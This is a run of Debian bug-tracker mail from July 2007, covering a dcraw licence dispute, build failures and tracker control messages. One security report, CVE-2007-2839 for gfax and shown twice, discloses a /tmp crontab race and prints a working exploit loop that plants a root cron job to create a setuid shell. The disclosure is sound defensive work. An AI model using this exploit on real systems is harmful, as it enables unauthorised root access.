2007-07-05 Thread Don Armstrong
Package: dcraw
Version: 7.02-1
Severity: serious

On Thu, 05 Jul 2007, Steve King wrote:
 However I would appreciate it if the assembled masses of legal
 experts could confirm that they agree that this is the case.

There's actually an even more fundamental problem with dcraw.c:

/*
   dcraw.c -- Dave Coffin's raw photo decoder
   Copyright 1997-2007 by Dave Coffin, dcoffin a cybercom o net

   This is a command-line ANSI C program to convert raw photos from
   any digital camera on any computer running any operating system.

   No license is required to download and use dcraw.c.  However,
   to lawfully redistribute this code, you must either (a) include
   full source code* for all executable files containing RESTRICTED
   functions, (b) remove all RESTRICTED functions, re-implement them,
   or copy them from an earlier, unrestricted Revision of dcraw.c,
   or (c) purchase a license from the author.

   The functions that process Foveon images have been RESTRICTED
   since Revision 1.237.  All other code remains free for all uses.

   *If you have not modified dcraw.c in any way, a link to my
   homepage qualifies as full source code.

   $Revision: 1.387 $
   $Date: 2007/06/24 00:18:52 $
 */


You'll notice that we have no permission to distribute modified
versions of dcraw.c as required by the DFSG. Secondly, it appears that
we must include full source code if we've modified dcraw.c, but we
don't do that. We distribute source alongside.

If you could get Dave Coffin to explicitely dual license under the
GPL, that'd clarify this entire problem. [He seems to want a copyleft,
which the GPL would grant.]

Text like:

Alternately, you can redistribute and/or modify this work under the
terms of the GNU General Public License as published by the Free
Software Foundation, either version 2 of the License, or (at your
option) any later version.

would do the trick.


Don Armstrong

-- 
If everything seems to be going well, you have obviously overlooked
something.
 -- Steven Wright

http://www.donarmstrong.com  http://rzlab.ucr.edu


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431887: bluez-hcidump: FTBFS: sniff_subrate_cp undeclared

2007-07-05 Thread Daniel Schepler
Package: blue-hcidump
Version: 1.35-1
Severity: serious

From my pbuilder build log:

...
cc -DHAVE_CONFIG_H -I. -I. -I.. -g -Wall -O2 -D_FORTIFY_SOURCE=2 -c hci.c
hci.c: In function 'sniff_subrate_dump':
hci.c:778: error: 'sniff_subrate_cp' undeclared (first use in this function)
hci.c:778: error: (Each undeclared identifier is reported only once
hci.c:778: error: for each function it appears in.)
hci.c:778: error: 'cp' undeclared (first use in this function)
hci.c: In function 'command_dump':
hci.c:1208: error: 'OCF_SNIFF_SUBRATE' undeclared (first use in this function)
...
make[3]: *** [hci.o] Error 1
make[3]: Leaving directory `/tmp/buildd/bluez-hcidump-1.35/parser'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/tmp/buildd/bluez-hcidump-1.35'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/tmp/buildd/bluez-hcidump-1.35'
make: *** [debian/stamp-makefile-build] Error 2
-- 
Daniel Schepler



Processed: tagging 423040

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.4
 tags 423040 - lenny
Bug#423040: Source package contains non-free IETF RFC/I-D
Tags were: lenny
Tags removed: lenny


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: control

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 423040 - lenny
Bug#423040: Source package contains non-free IETF RFC/I-D
There were no tags set.
Tags removed: lenny


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431680: marked as done (piuparts test: fails to install: Can't locate Data/Dumper.pm in @INC )

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 05 Jul 2007 18:47:06 +
with message-id [EMAIL PROTECTED]
and subject line Bug#431680: fixed in ssbd 0.10-3
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: ssbd
Version: 0.10-2
Severity: serious

hi,

while running archive wide piuparts tests your package failed on install with
the following error: 

 Setting up ssbd (0.10-2) ...
  Can't locate Data/Dumper.pm in @INC (@INC contains: /etc/perl 
/usr/local/lib/perl/5.8.8 /usr/local/share/perl/5.8.8 /usr/lib/perl5 
/usr/share/perl5 /usr/lib/perl/5.8 /usr/share/perl/5.8 /usr/local/lib/site_perl 
.) at /var/lib/dpkg/info/ssbd.config line 6.
  BEGIN failed--compilation aborted at /var/lib/dpkg/info/ssbd.config line 6.
  dpkg: error processing ssbd (--configure):
   subprocess post-installation script returned error exit status 2
  Errors were encountered while processing:
   ssbd
  E: Sub-process /usr/bin/dpkg returned an error code (1)

the full log can be found here:

 http://people.debian.org/~lucas/logs/2007/07/01/

bye,
- michael

---End Message---
---BeginMessage---
Source: ssbd
Source-Version: 0.10-3

We believe that the bug you reported is fixed in the latest version of
ssbd, which is due to be installed in the Debian FTP archive:

ssbd_0.10-3.diff.gz
  to pool/main/s/ssbd/ssbd_0.10-3.diff.gz
ssbd_0.10-3.dsc
  to pool/main/s/ssbd/ssbd_0.10-3.dsc
ssbd_0.10-3_i386.deb
  to pool/main/s/ssbd/ssbd_0.10-3_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Joop Stakenborg [EMAIL PROTECTED] (supplier of updated ssbd package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Thu, 05 Jul 2007 20:29:52 +0200
Source: ssbd
Binary: ssbd
Architecture: source i386
Version: 0.10-3
Distribution: unstable
Urgency: low
Maintainer: Debian Hamradio Maintainers [EMAIL PROTECTED]
Changed-By: Joop Stakenborg [EMAIL PROTECTED]
Description: 
 ssbd   - voice keyer for hamradio use
Closes: 431680
Changes: 
 ssbd (0.10-3) unstable; urgency=low
 .
   * Remove all references to Data::Dumper. Closes: #431680.
Files: 
 427df94e97a3a5df3b1e01277ae672b4 797 hamradio optional ssbd_0.10-3.dsc
 a2f20a9c6330cfa5fb265ad76c31bd93 110361 hamradio optional ssbd_0.10-3.diff.gz
 df8e3f2609dcbf17d58a0cb7a629bf67 31244 hamradio optional ssbd_0.10-3_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGjTpm/CqtjGLxpX8RAlufAKCdwvDLiv4SuLkkHxBJcjHl8HP+PwCdEmpq
OrgZvkGefjsuVaTVg/oLEm0=
=43YS
-END PGP SIGNATURE-

---End Message---


Bug#428582: xulrunner: please recheck with gcc-snapshot 20070613

2007-07-05 Thread Mike Hommey
On Wed, Jun 13, 2007 at 08:46:44PM +0200, Matthias Klose [EMAIL PROTECTED] 
wrote:
 Please recheck with the recent gcc-snapshot 20070613 upload. We may
 miss another backport from the trunk.

Did someone check already ?

 Side note: gcc-snapshot currently cannot be built due to the too
 strict dependencies on the binary-indep packages; reported as #385793,
 solved by the xulrunner maintainers.  Please build the package
 manually first, or make the libxul-dev package installable even if the
 release number of the indep and arch packages mismatch.  I still don't
 understand what the xulrunner maintainers want to prove with the strict
 dependency, but that's definitely something which delays things, even
 for the faster architectures.

Can it be built with the new dependencies ?

Mike


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#427904: balder2d: Maybe my error log can help you.

2007-07-05 Thread Salokine
Package: balder2d
Followup-For: Bug #427904

[EMAIL PROTECTED]:~$ balder2d
/usr/lib/balder2d/balder2d: Symbol `_ZTVN3gcn9TextFieldE' has 
different size in shared object, consider re-linking
/usr/lib/balder2d/balder2d: Symbol `_ZTVN3gcn6ButtonE' has 
different size in shared object, consider re-linking
Loading config manager
Initializing SDL.
Audio  video initialized correctly
creating renderer
creating sound manager
creating main menu
/usr/lib/balder2d/balder2d: symbol lookup error: 
/usr/lib/balder2d/balder2d: undefined symbol: 
_ZN3gcn14SDLImageLoaderC1Ev


-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.18-4-k7 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages balder2d depends on:
ii  balder2d-data   1.0~rc1-1data files for balder2d
ii  libboost-filesystem1.33 1.33.1-10filesystem operations (portable pa
ii  libc6   2.5-9+b1 GNU C Library: Shared libraries
ii  libgcc1 1:4.2-20070609-1 GCC support library
ii  libguichan0 0.6.1-2  small, efficient C++ GUI library
ii  libsdl-gfx1.2-4 2.0.13-3 drawing and graphical effects exte
ii  libsdl-image1.2 1.2.5-3  image loading library for Simple D
ii  libsdl-mixer1.2 1.2.6-2  mixer library for Simple DirectMed
ii  libsdl1.2debian 1.2.11-8 Simple DirectMedia Layer
ii  libstdc++6  4.2-20070609-1   The GNU Standard C++ Library v3
ii  python2.4   2.4.4-4  An interactive high-level object-o


balder2d recommends no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#428582: xulrunner: please recheck with gcc-snapshot 20070613

2007-07-05 Thread Steve Langasek
On Thu, Jul 05, 2007 at 08:55:53PM +0200, Mike Hommey wrote:
 On Wed, Jun 13, 2007 at 08:46:44PM +0200, Matthias Klose [EMAIL PROTECTED] 
 wrote:
  Please recheck with the recent gcc-snapshot 20070613 upload. We may
  miss another backport from the trunk.

 Did someone check already ?

Probably not; this discussion doesn't seem to be cc:ed to debian-mips?

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431883: dcraw license does not give permission to distribute modified versions or source alongside

2007-07-05 Thread Steve King

Hi Don,

The license against which you have raised a bug is not the one that 
covers the version that is currently part of debian. The appropriate 
license is here:


http://packages.debian.org/changelogs/pool/main/d/dcraw/dcraw_8.39-1/dcraw.copyright

You should also probably consider the text on the web page where the 
source is available http://cybercom.net/~dcoffin/dcraw/ :

[dcraw is] free (both gratis and libre)...
and
Unless otherwise noted in the source code, these programs are free for 
all uses...


If you could advise on any issues with that version, it would be 
appreciated.


My query on debian-legal was with respect to the current license text, 
rather than the historical license that applies to the version in debian.


However I will raise your comments with Mr Coffin.

Thanks for your help.

--
Steve King

Don Armstrong wrote:

Package: dcraw
Version: 7.02-1
Severity: serious

On Thu, 05 Jul 2007, Steve King wrote:

However I would appreciate it if the assembled masses of legal
experts could confirm that they agree that this is the case.


There's actually an even more fundamental problem with dcraw.c:

/*
   dcraw.c -- Dave Coffin's raw photo decoder
   Copyright 1997-2007 by Dave Coffin, dcoffin a cybercom o net

   This is a command-line ANSI C program to convert raw photos from
   any digital camera on any computer running any operating system.

   No license is required to download and use dcraw.c.  However,
   to lawfully redistribute this code, you must either (a) include
   full source code* for all executable files containing RESTRICTED
   functions, (b) remove all RESTRICTED functions, re-implement them,
   or copy them from an earlier, unrestricted Revision of dcraw.c,
   or (c) purchase a license from the author.

   The functions that process Foveon images have been RESTRICTED
   since Revision 1.237.  All other code remains free for all uses.

   *If you have not modified dcraw.c in any way, a link to my
   homepage qualifies as full source code.

   $Revision: 1.387 $
   $Date: 2007/06/24 00:18:52 $
 */


You'll notice that we have no permission to distribute modified
versions of dcraw.c as required by the DFSG. Secondly, it appears that
we must include full source code if we've modified dcraw.c, but we
don't do that. We distribute source alongside.

If you could get Dave Coffin to explicitely dual license under the
GPL, that'd clarify this entire problem. [He seems to want a copyleft,
which the GPL would grant.]

Text like:

Alternately, you can redistribute and/or modify this work under the
terms of the GNU General Public License as published by the Free
Software Foundation, either version 2 of the License, or (at your
option) any later version.

would do the trick.


Don Armstrong





--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: xscreensaver-command: Not working option -restart, -unthrottle, -deactivate, -throttle

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 package xscreensaver
Ignoring bugs not assigned to: xscreensaver

 severity 430848 important
Bug#430848: xscreensaver-command: Not working option -restart, -unthrottle, 
-deactivate, -throttle
Severity set to `important' from `critical'

 tags 430848 unreproducible
Bug#430848: xscreensaver-command: Not working option -restart, -unthrottle, 
-deactivate, -throttle
There were no tags set.
Tags added: unreproducible

 quit
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#428997: strace: FTBFS: ../net.c:803: error: 'PACKET_ADD_MEMBERSHIP' undeclared here (not in a function)

2007-07-05 Thread Roland McGrath
All of these problems indicate regressions in the installed kernel headers.
I don't think this should be considered an strace bug.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431883: dcraw license does not give permission to distribute modified versions or source alongside

2007-07-05 Thread Don Armstrong
On Thu, 05 Jul 2007, Steve King wrote:
 The license against which you have raised a bug is not the one that covers 
 the version that is currently part of debian. The appropriate license is 
 here:

Right, but the issues present in the current version of the license
are also present in the versions which we are distributing.

 http://packages.debian.org/changelogs/pool/main/d/dcraw/dcraw_8.39-1/dcraw.copyright

 You should also probably consider the text on the web page where the source 
 is available http://cybercom.net/~dcoffin/dcraw/ :
 [dcraw is] free (both gratis and libre)...
 and
 Unless otherwise noted in the source code, these programs are free for all 
  ^
 uses...

The underlined section is the important point. I'm almost certain that
Dave Coffin intends for the software to be free, but the dissonance
between the copyright statement in ddraw.c and the DFSG has to be
resolved.

[It's also not clear whether free applies to the ability to modify or
whether it merely means that you don't have to pay; licencing under
the GPL or MIT/Expat would resolve these questions as far as I'm
concerned.]

 My query on debian-legal was with respect to the current license text, 
 rather than the historical license that applies to the version in debian.

Yes; both issues came up in the context of re-examining the entire
license, though. I've only prsented the entire new license in the bug
report, since that was what the original question was about.

In any event, let me know if you need any assistance or clarification
in your communication with Dave.


Don Armstrong

-- 
Filing a bug is probably not going to get it fixed any faster.
 -- Anthony Towns

http://www.donarmstrong.com  http://rzlab.ucr.edu


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: reassign 425700 to linux-libc-dev, forcibly merging 423462 425700

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.26
 reassign 425700 linux-libc-dev
Bug#425700: sendmail_8.14.1-4(ia64/unstable): FBTFS: = has no left operand
Bug reassigned from package `sendmail' to `linux-libc-dev'.

 forcemerge 423462 425700
Bug number 423462 not found. (Is it archived?)


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431893: CVE-2007-2839: Trivial local-root attack

2007-07-05 Thread Steve Kemp

Package: gfax
Version: 0.4.2-11
Severity: grave
Usertags: sourcescan
Tags: security

*** Please type your report below this line ***


  The gfax package as released in Sarge, make unsafe use of temporary files
 which allow local users to gain root trivially.

  Etch, Lenny, and Sid are unaffected.


  The following code is in src/mgetty_setup.c:

/* if it's NULL then nuke the faxrunq crontab entry.  */
if ((fin = fopen(/etc/crontab, r)) == NULL) {
do_message(_(\nCan't open /etc/crontab\n));
return;
}
if ((fout = fopen(/tmp/crontab, w)) == NULL) {
do_message(_(\nCan't create /tmp/crontab\n));
return;
}

while (fgets(buf, 128, fin) != NULL) {
fputs(buf, fout);
fclose(fout);
fclose(fin);

/* now copy the new file back to /etc */
if ((fin = fopen(/tmp/crontab, r)) == NULL) {
do_message(_(\nCan't open /tmp/crontab\n));
return;
}
if ((fout = fopen(/etc/crontab, w)) == NULL) {
do_message(_(\nCan't create /etc/crontab\n));
return;
}

while ((c = fgetc(fin)) != EOF)
fputc(c, fout);

fclose(fout);
fclose(fin);
remove(/tmp/crontab);


  This can be abused to write arbitary commands to the /etc/crontab file.

  If /tmp/crontab exists already, owned by a non-root user then it will
 be truncated and trashed.  However the ownership will still remain that
 of the non-root user - so a race condition between the first copy
 and the second copy can allow arbitary line(s) to be appended to /etc/crontab.

  The following exploits this easily:

[EMAIL PROTECTED]:~$ while true; do echo */1 * * * * root /bin/cp /bin/sh /tmp 
 chmod 4755 /tmp/sh  /tmp/crontab; done

  When root runs the setup program things end up like this:

[EMAIL PROTECTED]:~$ ls -l /etc/crontab 
-rw-r--r-- 1 root root 60 2007-07-02 20:27 /etc/crontab

[EMAIL PROTECTED]:~$ cat /etc/crontab
*/1 * * * * root /bin/cp /bin/sh /tmp  chmod 4755 /tmp/sh

[EMAIL PROTECTED]:~$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 769368 2007-07-02 20:28 /tmp/sh


Steve
-- 
http://www.steve.org.uk/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#425897: Still FTBFS (usually) for me

2007-07-05 Thread Daniel Schepler
reopen 425897
severity 425897 important
retitle 425897 libfilesys-diskspace-perl: FTBFS sometimes: Race condition in 
tests
notfixed 425897 0.05-11
thanks

First of all, I didn't see any of your comments to the bug before it was
closed, because you never CC'd me or 425897-submitter...

With the latest version, the package still failed to build for me.  I had a
look at the tests, and it appears that at least linux-ext2.t runs df and
compares the results with the results from the Perl module.  This is just
begging for a race condition, though, and that's probably what's causing
it to FTBFS on my system.
-- 
Daniel Schepler


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: closing 425700

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.26
 close 425700 2.6.21-3
Bug#425700: sendmail_8.14.1-4(ia64/unstable): FBTFS: = has no left operand
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug marked as fixed in version 2.6.21-3, send any further explanations to 
[EMAIL PROTECTED]


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#428997: strace: FTBFS: ../net.c:803: error: 'PACKET_ADD_MEMBERSHIP' undeclared here (not in a function)

2007-07-05 Thread Frederik Schueler
Hello Roland,

On Thu, Jul 05, 2007 at 11:54:47AM -0700, Roland McGrath wrote:
 All of these problems indicate regressions in the installed kernel headers.
 I don't think this should be considered an strace bug.

The installed headers are what the kernel version 2.6.21 (tested with
2.6.22-rc4 too) does put together when running make headers_install, so
this might be a vanilla kernel issue.

I came this far investigating this issue:

Using the headers from the linux-kernel-headers package (apparently 
manually assembled by the Debian Glibc team) strace builds fine, while
using linux-libc-dev - which is the packaged outcome of 
make headers_install in the kernel-tree the build fails due to some 
missing defines.
the missing defines are declared in compiler.h, which is not
intended for userspace. Looking at scripts/Makefile.headersinst in the
kernel, you can see all references to it are removed from the other
headers on export. 

After some fruitless digging on lkml and a some discussions on IRC in
#debian-glibc it seemed including stddef.h is mandatory now to get
those defines.

If you have a better fix, please tell me.

Best regards
Frederik Schüler

-- 
ENOSIG


signature.asc
Description: Digital signature


Bug#431893: marked as done (CVE-2007-2839: Trivial local-root attack)

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 5 Jul 2007 21:12:59 +0100
with message-id [EMAIL PROTECTED]
and subject line Bug#431893: Acknowledgement (CVE-2007-2839: Trivial local-root 
attack)
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---

Package: gfax
Version: 0.4.2-11
Severity: grave
Usertags: sourcescan
Tags: security

*** Please type your report below this line ***


  The gfax package as released in Sarge, make unsafe use of temporary files
 which allow local users to gain root trivially.

  Etch, Lenny, and Sid are unaffected.


  The following code is in src/mgetty_setup.c:

/* if it's NULL then nuke the faxrunq crontab entry.  */
if ((fin = fopen(/etc/crontab, r)) == NULL) {
do_message(_(\nCan't open /etc/crontab\n));
return;
}
if ((fout = fopen(/tmp/crontab, w)) == NULL) {
do_message(_(\nCan't create /tmp/crontab\n));
return;
}

while (fgets(buf, 128, fin) != NULL) {
fputs(buf, fout);
fclose(fout);
fclose(fin);

/* now copy the new file back to /etc */
if ((fin = fopen(/tmp/crontab, r)) == NULL) {
do_message(_(\nCan't open /tmp/crontab\n));
return;
}
if ((fout = fopen(/etc/crontab, w)) == NULL) {
do_message(_(\nCan't create /etc/crontab\n));
return;
}

while ((c = fgetc(fin)) != EOF)
fputc(c, fout);

fclose(fout);
fclose(fin);
remove(/tmp/crontab);


  This can be abused to write arbitary commands to the /etc/crontab file.

  If /tmp/crontab exists already, owned by a non-root user then it will
 be truncated and trashed.  However the ownership will still remain that
 of the non-root user - so a race condition between the first copy
 and the second copy can allow arbitary line(s) to be appended to /etc/crontab.

  The following exploits this easily:

[EMAIL PROTECTED]:~$ while true; do echo */1 * * * * root /bin/cp /bin/sh /tmp 
 chmod 4755 /tmp/sh  /tmp/crontab; done

  When root runs the setup program things end up like this:

[EMAIL PROTECTED]:~$ ls -l /etc/crontab 
-rw-r--r-- 1 root root 60 2007-07-02 20:27 /etc/crontab

[EMAIL PROTECTED]:~$ cat /etc/crontab
*/1 * * * * root /bin/cp /bin/sh /tmp  chmod 4755 /tmp/sh

[EMAIL PROTECTED]:~$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 769368 2007-07-02 20:28 /tmp/sh


Steve
-- 
http://www.steve.org.uk/

---End Message---
---BeginMessage---

  This is fixed in DSA-1329-1.  Just reported here for reference.

Steve
-- 
---End Message---


Bug#431893: Acknowledgement (CVE-2007-2839: Trivial local-root attack)

2007-07-05 Thread Steve Kemp

  This is fixed in DSA-1329-1.  Just reported here for reference.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#422211: marked as done (/usr/lib/rpm/macros contains a wrong path for bzip2)

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 05 Jul 2007 21:02:06 +
with message-id [EMAIL PROTECTED]
and subject line Bug#422211: fixed in rpm 4.4.1-14.1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: rpm
Version: 4.4.1-14
Severity: grave
Justification: renders package unusable

When trying to build wxPython from it's spec file on Debian 4.0 it tries
to unpack the tar.bz2 using /usr/bin/bzip2.
The correct path is obviously /bin/bzip2.

-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (990, 'stable'), (500, 'testing')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.16-2-686-smp
Locale: LANG=de_DE, LC_CTYPE=de_DE (charmap=ISO-8859-1)

Versions of packages rpm depends on:
ii  libbeecr 4.1.2-6 open source C library of cryptogra
ii  libbz2-1 1.0.3-6 high-quality block-sorting file co
ii  libc62.3.6.ds1-13GNU C Library: Shared libraries
ii  libcomer 1.39+1.40-WIP-2006.11.14+dfsg-2 common error description library
ii  libkrb53 1.4.4-7etch1MIT Kerberos runtime libraries
ii  libpopt0 1.10-3  lib for parsing cmdline parameters
ii  librpm4  4.4.1-13RPM shared library
ii  libselin 1.32-3  SELinux shared libraries
ii  libssl0. 0.9.8c-4SSL shared libraries
ii  perl 5.8.8-7 Larry Wall's Practical Extraction 
ii  zlib1g   1:1.2.3-13  compression library - runtime

rpm recommends no packages.

-- no debconf information

---End Message---
---BeginMessage---
Source: rpm
Source-Version: 4.4.1-14.1

We believe that the bug you reported is fixed in the latest version of
rpm, which is due to be installed in the Debian FTP archive:

librpm-dev_4.4.1-14.1_i386.deb
  to pool/main/r/rpm/librpm-dev_4.4.1-14.1_i386.deb
librpm4_4.4.1-14.1_i386.deb
  to pool/main/r/rpm/librpm4_4.4.1-14.1_i386.deb
lsb-rpm_4.4.1-14.1_i386.deb
  to pool/main/r/rpm/lsb-rpm_4.4.1-14.1_i386.deb
python-rpm_4.4.1-14.1_i386.deb
  to pool/main/r/rpm/python-rpm_4.4.1-14.1_i386.deb
rpm_4.4.1-14.1.diff.gz
  to pool/main/r/rpm/rpm_4.4.1-14.1.diff.gz
rpm_4.4.1-14.1.dsc
  to pool/main/r/rpm/rpm_4.4.1-14.1.dsc
rpm_4.4.1-14.1_i386.deb
  to pool/main/r/rpm/rpm_4.4.1-14.1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Clint Adams [EMAIL PROTECTED] (supplier of updated rpm package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Thu, 05 Jul 2007 14:35:41 -0400
Source: rpm
Binary: python-rpm rpm librpm-dev lsb-rpm librpm4
Architecture: source i386
Version: 4.4.1-14.1
Distribution: unstable
Urgency: low
Maintainer: Anibal Monsalve Salazar [EMAIL PROTECTED]
Changed-By: Clint Adams [EMAIL PROTECTED]
Description: 
 librpm-dev - RPM shared library, development kit
 librpm4- RPM shared library
 lsb-rpm- Red Hat package manager for LSB package building
 python-rpm - Python bindings for RPM
 rpm- Red Hat package manager
Closes: 399750 420406 421963 422211
Changes: 
 rpm (4.4.1-14.1) unstable; urgency=low
 .
   * NMU
   * Change build dependency on libdb3-dev to libdb4.5-dev.
 closes: #420406, #421963.
   * Add build dependency on bzip2 so configure can find the proper
 path to the bzip2 binary.  closes: #422211.
   * Add build-dependency on quilt, and apply Petr Salinger's patch to
 use quilt in debian/rules.
   * Drop debian/changelog hunk from 20-no-linux-gate.so-dependancy.diff .
   * Clean up source package so that quilt patches will apply.
 closes: #399750.
Files: 
 26362cef7ad1fba38a879b724cabf854 1072 admin optional rpm_4.4.1-14.1.dsc
 10ff91acdc81ca40c583ac26d364686e 30636 admin optional rpm_4.4.1-14.1.diff.gz
 4fc899671ff4357baa88b81e9ddc3f2b 853642 admin optional rpm_4.4.1-14.1_i386.deb
 113b3a20eb7a8b066854192bd4fd0da7 2477572 devel optional 
lsb-rpm_4.4.1-14.1_i386.deb
 744287a923ca190ec2d5f46e13451e9c 981596 libs optional 
librpm4_4.4.1-14.1_i386.deb
 de190321550b9f6a81c53895968d0118 1310706 libdevel extra 

Processed: your mail

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 431580 + fixed-upstream
Bug#431580: depends on non-essential package debconf in postrm
Tags were: etch-ignore
Tags added: fixed-upstream

 --
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431906: berusky: no data in levels

2007-07-05 Thread Tomas Safarik
Package: berusky
Version: 1.1-1
Severity: grave
Justification: renders package unusable


When I start game there are no data in levels - no walls, no barrels,
only the bug you can move, but you cannot play it.

I had the same problem when I compiled the game from sources provided on
the internet. So I asssume it is connected with my architecture -
powerpc. Maybe the bug might be to the berusky-data package, but I don't
know how to find that out.


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: powerpc (ppc)

Kernel: Linux 2.6.21-2-powerpc
Locale: LANG=en_US.UTF-8, LC_CTYPE=cs_CZ.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages berusky depends on:
ii  berusky-data1.0-1Data files for Berusky
ii  libc6   2.5-11   GNU C Library: Shared libraries
ii  libgcc1 1:4.2-20070627-1 GCC support library
ii  libsdl1.2debian 1.2.11-9 Simple DirectMedia Layer
ii  libstdc++6  4.2-20070627-1   The GNU Standard C++ Library v3

berusky recommends no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431031: fixed upstream?

